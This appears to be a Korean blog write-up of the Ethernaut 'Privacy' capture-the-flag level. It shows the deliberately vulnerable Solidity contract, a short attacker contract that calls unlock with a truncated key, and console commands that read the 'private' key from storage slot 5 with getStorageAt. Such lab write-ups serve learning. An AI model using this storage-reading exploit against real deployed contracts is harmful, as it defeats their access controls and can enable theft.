소스코드
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Privacy {
bool public locked = true;
uint256 public ID = block.timestamp;
uint8 private flattening = 10;
uint8 private denomination = 255;
uint16 private awkwardness = uint16(now);
bytes32[3] private data;
constructor(bytes32[3] memory _data) public {
data = _data;
}
function unlock(bytes16 _key) public {
require(_key == bytes16(data[2]));
locked = false;
}
/*
A bunch of super advanced solidity algorithms...
,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`
.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,
*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^ ,---/V\
`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*. ~|__(o.o)
^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*' UU UU
*/
}
목표
잠금 해제
방법
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "./Privacy.sol";
contract PrivacyAttack {
Privacy target;
constructor(address _targetAdr) public {
target = Privacy(_targetAdr);
}
function attack(bytes32 _key) public {
target.unlock(bytes16(_key));
}
}콘솔에서
1. let adr = await contract.address
2. await web3.eth.getStorageAt(adr, 5, function(err, result) { console.log(result);}) (attack param)
'블록체인 > Ethernaut' 카테고리의 다른 글
| [Ethernaut] 14. Gatekeeper Two (0) | 2022.06.10 |
|---|---|
| [Ethernaut] 13. Gatekeeper One (0) | 2022.06.08 |
| [Ethernaut] 11. Elevator (0) | 2022.06.06 |
| [Ethernaut] 10. Re-entrancy (0) | 2022.06.05 |
| [Ethernaut] 9. King (0) | 2022.06.04 |